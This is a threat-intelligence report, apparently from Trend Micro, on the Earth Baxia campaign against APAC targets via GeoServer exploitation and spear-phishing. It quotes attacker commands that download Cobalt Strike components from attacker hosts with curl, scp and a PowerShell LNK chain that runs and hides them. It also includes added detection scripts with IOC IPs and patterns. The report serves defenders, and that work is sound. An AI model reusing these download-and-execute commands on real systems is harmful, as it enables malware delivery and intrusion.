URL: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html

APT & Targeted Attacks


EARTH BAXIA USES SPEAR-PHISHING AND GEOSERVER EXPLOIT TO TARGET APAC

We observed Earth Baxia carrying out targeted attacks against APAC countries
that involved advanced techniques like spear-phishing and customized malware,
with data suggesting that the group operates from China.

By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen September 19, 2024
Read time: 8 min (2215 words)

--------------------------------------------------------------------------------

SUMMARY

 * Threat actor Earth Baxia has targeted a government organization in Taiwan –
   and potentially other countries in the Asia-Pacific (APAC) region – using
   spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
 * CVE-2024-36401 is a remote code execution vulnerability that allowed the
   threat actors to download or copy malicious components.
 * The threat actor employs GrimResource and AppDomainManager injection to
   deploy additional payloads, aiming to lower the victim’s guard.
 * Customized Cobalt Strike components were deployed on compromised machines
   through the two initial access vectors. The altered version of Cobalt Strike
   included modified internal signatures and a changed configuration structure
   for evasion.
 * Earth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple
   communication protocols for information gathering and payload delivery.

In July, we observed suspicious activity targeting a government organization in
Taiwan, with other APAC countries also likely targeted, attributed to the threat
actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails
and exploited CVE-2024-36401, a vulnerability in an open-source server for
sharing geospatial data called GeoServer, as initial access vectors, deploying
customized Cobalt Strike components on compromised machines. Additionally, we
identified a new backdoor called EAGLEDOOR that supports multiple protocols. In
this report, we will discuss their infection chain and provide a detailed
analysis of the malware involved.

ATTRIBUTION AND VICTIMOLOGY

Upon investigation, we discovered that multiple servers were hosted on the
Alibaba cloud service or located in Hong Kong, and some related samples were
submitted to VirusTotal from China. After checking one of the Cobalt Strike
watermarks (666666) used by the threat actors on Shodan, we also found that only
a few machines were linked to this watermark, most of which were in China (Table
1). Therefore, we suspect that the APT group behind these campaigns originates
from China.

Country      Number of machines
China        13
Japan        1
Singapore    1

Table 1. Machines linked to the Cobalt Strike watermark 666666

Based on the collected phishing emails, decoy documents, and observations from
incidents, it appears that the targets are primarily government agencies,
telecommunication businesses, and the energy industry in the Philippines, South
Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a
decoy document written in simplified Chinese, suggesting that China is also one
of the impacted countries. However, due to limited information, we cannot
accurately determine which sectors in China are affected.

Figure 1. Map chart of impacted regions

INFECTION CHAIN

In this section, we will discuss the threat group’s attack flow as identified by
our telemetry, including the malware and tactics, techniques, and procedures
(TTPs) involved, as shown in Figure 2.

Figure 2. Overview of the attack chain

INITIAL ACCESS

VULNERABLE GEOSERVER

In some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution
(RCE) vulnerability in GeoServer, to execute arbitrary commands. Our
investigation revealed that they used commands like “curl” and “scp” to download
or copy malicious components into the victim’s environment, and then executed
these components through the same RCE vulnerability (Table 2).

The file download via curl is as follows:

curl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name} http://167[.]172[.]89[.]142/{file name}

The remote file copy via scp is as follows:

cmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\windows\temp\"

File name    Description
Edge.exe     Legitimate executable used to load msedge.dll
msedge.dll   Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)
Logs.txt     Customized Cobalt Strike shellcode

Table 2. The malicious components downloaded through the RCE vulnerability

SPEAR-PHISHING EMAIL VECTOR

In early August, Earth Baxia began leveraging phishing emails to advance their
attacks. One of the victims reported receiving over 70 phishing emails within
approximately two weeks. We also identified similar email attachments on
VirusTotal. Analysis of the decoy documents suggests that the attackers may have
targeted not just Taiwan, but also Vietnam and China.

Most of the email subjects are meticulously tailored with varying content; the
attached ZIP file contains a decoy MSC file, which we named RIPCOY. When the user
double-clicks this file, the obfuscated VBScript embedded in the MSC file (the
GrimResource technique) attempts to download multiple files from a public cloud
service, typically Amazon Web Services (AWS). These files include a decoy PDF
document, .NET applications, and a configuration file.

The .NET applications and configuration file dropped by the MSC file then use a
technique known as AppDomainManager injection, which injects a custom application
domain manager to execute arbitrary code within the process of the target
application. It enables any .NET application to load an arbitrary managed DLL,
either locally or remotely from a website, without directly invoking any Windows
API calls (Figure 3).
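On the defender side, the misuse described above leaves a trace in the `.exe.config` file that the legitimate .NET executable reads at start-up. The Python example below is added here and is not part of Trend Micro's report: it parses such a config, flags the `appDomainManagerAssembly` / `appDomainManagerType` runtime settings and any `codeBase href` that points to a web site; the two sample configs, the assembly name "Loader" and the URL are constructed placeholders.

```python
"""Spot AppDomainManager injection set-up in .NET <app>.exe.config files.

A .NET Framework executable reads <name>.exe.config when it starts. Two
<runtime> settings make the CLR load a managed assembly of the attacker's
choosing before the program's own code runs:

    <appDomainManagerAssembly value="..."/>   assembly hosting the manager
    <appDomainManagerType value="..."/>       type derived from AppDomainManager

A <codeBase href="http(s)://..."/> binding lets that assembly be fetched from a
web site, which is the "remotely from a website" case the report describes.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
import xml.etree.ElementTree as ET


@dataclass
class Finding:
    path: str
    manager_assembly: Optional[str] = None
    manager_type: Optional[str] = None
    remote_codebases: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Either AppDomainManager setting is enough for the CLR to attempt the
        # load; a remote code base on its own also deserves a closer look.
        return bool(self.manager_assembly or self.manager_type
                    or self.remote_codebases)


def _local_name(tag: str) -> str:
    """Strip a namespace prefix such as {urn:schemas-microsoft-com:asm.v1}."""
    return tag.rsplit("}", 1)[-1]


def analyze_config(xml_text: str, path: str = "<memory>") -> Finding:
    """Parse one .config document and collect the injection-related settings."""
    finding = Finding(path=path)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return finding  # not XML at all: nothing to report
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name == "appDomainManagerAssembly":
            finding.manager_assembly = elem.get("value")
        elif name == "appDomainManagerType":
            finding.manager_type = elem.get("value")
        elif name == "codeBase":
            href = (elem.get("href") or "").strip()
            if href.lower().startswith(("http://", "https://")):
                finding.remote_codebases.append(href)
    return finding


def scan_configs(configs: Dict[str, str]) -> List[Finding]:
    """Return a Finding for every {path: xml_text} entry that looks suspicious."""
    hits = []
    for path, text in configs.items():
        finding = analyze_config(text, path)
        if finding.suspicious:
            hits.append(finding)
    return hits


# Constructed sample 1: an ordinary config that only pins the runtime version.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8"/>
  </startup>
</configuration>"""

# Constructed sample 2: the injection pattern. "Loader" and the URL are
# placeholders, not indicators from the report.
INJECTION_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="Loader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null"/>
    <appDomainManagerType value="Loader.Manager"/>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Loader" culture="neutral"/>
        <codeBase version="1.0.0.0" href="https://example.invalid/stage/Loader.dll"/>
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>"""


if __name__ == "__main__":
    for hit in scan_configs({"benign.exe.config": BENIGN_CONFIG,
                             "sample.exe.config": INJECTION_CONFIG}):
        print(f"{hit.path}: assembly={hit.manager_assembly!r} "
              f"type={hit.manager_type!r} remote={hit.remote_codebases}")
```

In a real sweep, feed `scan_configs` the contents of every `*.exe.config` found beside .NET executables in user-writable directories, since the report's samples were dropped next to the legitimate application.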

Figure 3. The configuration file contains download sites loaded by the .NET
framework application

The legitimate .NET applications then proceed to download the next-stage
downloader from the URL specified in the .config file, which points to a .NET
DLL file (Figure 4). The URL for this download is obfuscated using Base64 and AES
encryption. Most of the download sites identified at this stage were hosted on
public cloud services, typically Aliyun. Once the DLL retrieves the shellcode, it
executes it using the CreateThread API, with the whole process running entirely
in memory.

Figure 4. The .NET DLL file contains a download site with obfuscated code

The shellcode gathers information from the affected machine, including the
username, computer name, parent process (the legitimate .NET application), and
memory status. It appends this information as a ‘client_id’ parameter to a URL
and sends it to a custom domain. It may receive a 64-character response from the
server, which is then used to request the next payload from the URL (Figure 5).
However, we were unable to retrieve the final payload.

Figure 5. A screenshot of network traffic analysis from the VirusTotal sandbox

The shellcode exhibited several distinct features:

 * The attacker disguised the domain names to resemble public cloud services by
   using names like “s3cloud-azure” or “s2cloud-amazon”. Each network request
   followed a specific pattern, including a unique user-agent string and data
   formatted in JSON.
 * The final stage of the download process always had the path
   “/api/v1/homepage/”, suggesting that the file might still be hosted on a
   third-party cloud service.
 * By hosting files on the cloud, the attacker gains the advantage of easily
   replacing or updating files, including .config files with different download
   links, making it significantly more challenging for us to track their
   activities.

Although we didn’t confirm what the final shellcode was, our telemetry did
reveal that the “oncesvc.exe” launched by the MSC file would run another
process, “Edge.exe”, to load the Cobalt Strike components msedge.dll and
Logs.txt. In the next section, we discuss these components further.

BACKDOOR ANALYSIS

COBALT STRIKE

Earth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure
6). To evade defenses, the shellcode loader, known as “SWORDLDR,” decrypts the
payload and injects it into a specified process according to its embedded
configuration (Figure 7). 

Figure 6. Decrypted shellcode
Figure 7. Execution flow of Cobalt Strike components

The injected shellcode is a customized version of Cobalt Strike. Unlike the
usual Cobalt Strike payload, the modified version’s MZ header has been removed
and the internal signatures have been modified (Figure 8). Additionally, the
configuration structure has also been slightly changed (Figure 9).

Figure 8. Header differences between the usual (left) and modified (right)
versions of Cobalt Strike
Figure 9. Differences in configuration structures between the usual (left) and
modified (right) versions of Cobalt Strike

EAGLEDOOR

On the victim side, we collected these sample sets:

 * Systemsetting.dll (EAGLEDOOR loader)
 * Systemsetting.exe

These samples are components of EAGLEDOOR, which was dropped and launched by the
Cobalt Strike process mentioned previously.

The threat actors apply DLL side-loading to start the loader and execute
EAGLEDOOR in memory. In the loader, there are two DLL files encrypted in the
.data section:

Hook.dll

This module exports a function, MyCreateHook, that hooks frequently called APIs
(Figure 10). Once a hooked API is called, the malicious module Eagle.dll is
executed.

Figure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary
and LdrUnloadDll

Eagle.dll

The code flow for launching Eagle.dll is shown below. The loader decrypts this
module and executes its first export function, “RunEagle”, in memory (Figure
11).

Figure 11. The code flow to start Eagle.dll in the loader

EAGLEDOOR supports four methods to communicate with a C&C server:

 * DNS
 * HTTP
 * TCP
 * Telegram

Our analysis shows that the TCP, HTTP, and DNS protocols are used to send the
victim machine’s status to a C&C server. The main backdoor functionality is
implemented over Telegram through the Bot API, using the following methods:

 * getFile
 * getUpdates
 * sendDocument
 * sendMessage

These methods are effective for gathering information, delivering files, and
executing the next payload on the victim's system. However, in this case, we
only collected samples related to TCP and HTTP protocols on the victim side.
Therefore, we will keep monitoring the channel to track the threat actors' next
steps in their Telegram communications.

EXFILTRATION

Based on our investigation, we observed that Earth Baxia archives the collected
data and exfiltrates it using curl.exe. Figure 12 shows a case of data
exfiltration to their file server (152[.]42[.]243[.]170) through curl.

Figure 12. The process for exfiltration by curl.exe

FURTHER OBSERVATIONS

Most phishing emails lure users with an attachment. However, based on our
telemetry, some phishing emails are sent with a phishing link that downloads a
ZIP file. So far, we know of four combinations at the initial access stage, as
shown in Figure 13. Both the MSC and LNK files are able to deliver the two
toolsets.

Figure 13. The combinations we know at initial access

While investigating the case, we came across the download site
static[.]krislab[.]site in an LNK file. It executes a PowerShell command to
download decoy documents and Cobalt Strike toolsets, which include Edge.exe,
msedge.dll, and Logs.txt (Table 3). This toolset is similar to the one we
mentioned earlier in this blog entry.

Each ZIP file contains an LNK file whose target is the following PowerShell command:

wget -Uri https://static.krislab.site/infodata/msedge.dll -OutFile C:\Users\Public\msedge.dll; wget -Uri https://static.krislab.site/infodata/Logs.txt -OutFile C:\Users\Public\Logs.txt;wget -Uri https://static.krislab.site/infodata/Edge.exe -OutFile C:\Users\Public\Edge.exe;C:\Users\Public\Edge.exe;wget -Uri "https://static.krislab.site/infodata/yn.pdf" -OutFile "C:\Users\Public\邀請函.pdf";C:\Windows\System32\cmd.exe /c start /b "C:\Users\Public\邀請函.pdf";attrib +s +h C:\Users\Public\Edge.exe;attrib +s +h C:\Users\Public\Logs.txt;attrib +s +h C:\Users\Public\msedge.dll

Discovered Date   Path                           File description
June 21, 2024     /infodata/Invitation1017.zip   Cobalt Strike tool set
                  /infodata/Edge.exe
                  /infodata/msedge.dll
                  /infodata/Logs.txt
                  /infodata/tw.pdf               Decoy document
June 25, 2024     /infodata/break_1/06.pdf       Decoy document
June 30, 2024     /infodata/Invitation0630.zip   Cobalt Strike tool set
                  /infodata/Edge.exe
                  /infodata/msedge.dll
                  /infodata/Logs.txt
                  /infodata/yn.pdf               Decoy document
July 2, 2024      /infodata/Invitation0702.zip   Cobalt Strike tool set
                  /infodata/Edge.exe
                  /infodata/msedge.dll
                  /infodata/Logs.txt
                  /infodata/hzm.pdf              Decoy document
August 15, 2024   /infodata/Edge.exe             Cobalt Strike tool set
                  /infodata/msedge.dll
                  /infodata/Logs.txt
                  /infodata/k1.pdf               Decoy document

Table 3. Files hosted on static[.]krislab[.]site

TREND MICRO VISION ONE THREAT INTELLIGENCE 

To stay ahead of evolving threats, Trend Micro customers can access a range of
Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat
Insights helps customers stay ahead of cyber threats before they happen and
better prepared for emerging threats. It offers comprehensive information on
threat actors, their malicious activities, and the techniques they use. By
leveraging this intelligence, customers can take proactive steps to protect
their environments, mitigate risks, and respond effectively to threats.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

 * Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
 * Earth Baxia: A dive into their aggressive campaign in August

Trend Micro Vision One Threat Insights App

 * Threat Actor: Earth Baxia
 * Emerging Threats: Earth Baxia Uses Spear-Phishing and GeoServer Exploit to
   Target APAC

HUNTING QUERIES

Trend Micro Vision One Search App

Vision One customers can use the Search App to match or hunt the malicious
indicators mentioned in this blog post with data in their environment.

Network Communication with Earth Baxia - IP

eventId:3 AND (src:"167.172.89.142" OR src:"167.172.84.142" OR
src:"152.42.243.170" OR src:"188.166.252.85" OR dst:"167.172.89.142" OR
dst:"167.172.84.142" OR dst:"152.42.243.170" OR dst:"188.166.252.85")

More hunting queries are available for Vision One customers with Threat Insights
Entitlement enabled. 
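As an added example (not from the original post or from Vision One), the following Python applies the same IP hunt to Sysmon-style events, and also checks the two host-side patterns described earlier: curl.exe reaching the 152.42.243.170 file server, and the LNK chain that downloads into C:\Users\Public and then hides the files with attrib +s +h. The event dict shape, the sample command lines and the local addresses are constructed assumptions; only the IPs, domain and paths come from the post.

```python
import re

# C&C / file-server IPs from the Vision One hunting query above (undefanged).
EARTH_BAXIA_IPS = {"167.172.89.142", "167.172.84.142", "152.42.243.170", "188.166.252.85"}
EXFIL_FILE_SERVER = "152.42.243.170"

# LNK chain pattern: download into C:\Users\Public, then hide the files with attrib +s +h.
WGET_TO_PUBLIC_RE = re.compile(
    r'(?:wget|iwr|Invoke-WebRequest)\s+-Uri\s+\S+\s+-OutFile\s+"?C:\\Users\\Public\\', re.I)
ATTRIB_HIDE_RE = re.compile(r"attrib\s+\+s\s+\+h\s+C:\\Users\\Public\\", re.I)

def hunt(events):
    """Return (rule, event_index) findings over Sysmon-style event dicts.
    Assumed constructed shapes: {'eventId': 3, 'src': ip, 'dst': ip} for network
    connections and {'eventId': 1, 'image': path, 'cmd': str} for process creation.
    """
    findings = []
    for i, ev in enumerate(events):
        if ev["eventId"] == 3:
            if {ev["src"], ev["dst"]} & EARTH_BAXIA_IPS:
                findings.append(("earth_baxia_ip", i))
        elif ev["eventId"] == 1:
            image, cmd = ev["image"].lower(), ev["cmd"]
            if image.endswith("curl.exe") and EXFIL_FILE_SERVER in cmd:
                findings.append(("curl_exfil_to_file_server", i))
            if (image.endswith("powershell.exe") and WGET_TO_PUBLIC_RE.search(cmd)
                    and ATTRIB_HIDE_RE.search(cmd)):
                findings.append(("lnk_download_and_hide_chain", i))
    return findings

# Constructed sample events; the curl upload syntax is illustrative, not from the post.
SAMPLE_EVENTS = [
    {"eventId": 3, "src": "10.0.0.5", "dst": "167.172.89.142"},
    {"eventId": 3, "src": "10.0.0.5", "dst": "8.8.8.8"},
    {"eventId": 1, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -T C:\Users\Public\data.rar http://152.42.243.170/"},
    {"eventId": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"wget -Uri https://static.krislab.site/infodata/msedge.dll "
            r"-OutFile C:\Users\Public\msedge.dll;attrib +s +h C:\Users\Public\msedge.dll"},
    {"eventId": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "Get-Process"},
]

if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(rule, SAMPLE_EVENTS[idx])
```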

CONCLUSION

Earth Baxia, likely based in China, conducted a sophisticated campaign targeting
government and energy sectors in multiple APAC countries. They used advanced
techniques like GeoServer exploitation, spear-phishing, and customized malware
(Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of
public cloud services for hosting malicious files and the multi-protocol support
of EAGLEDOOR highlight the complexity and adaptability of their operations.

Continued vigilance and advanced threat detection measures are essential to
counter such threats. To mitigate the risk of this kind of threat, security
teams can also implement the following best practices:

 * Implement continuous phishing awareness training for employees.
 * Double-check the sender and subject of emails, particularly those from
   unfamiliar sources or with vague subjects.
 * Deploy multi-layered protection solutions to help detect and block threats
   early in the malware infection chain.

Organizations can help protect themselves from these kinds of attacks with Trend
Vision One™, which enables security teams to continuously identify attack
surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision
One helps organizations prioritize and address potential risks, including
vulnerabilities. It considers critical factors such as the likelihood and impact
of potential attacks and offers a range of prevention, detection, and response
capabilities. The multilayered protection and behavior detection Vision One
offers can help block malicious tools and services before they can inflict
damage on user machines and systems.

INDICATORS OF COMPROMISE (IOCS)

The full list of IOCs can be found here.

Tags
Phishing | APT & Targeted Attacks | Articles, News, Reports


AUTHORS

 * Ted Lee
   
   Threat Researcher

 * Cyris Tseng
   
   Threat Researcher

 * Pierre Lee
   
   Sr. Threat Researcher

 * Sunny Lu
   
   Threats Analyst

 * Philip Chen
   
   Threat Researcher

Copyright ©2024 Trend Micro Incorporated. All rights reserved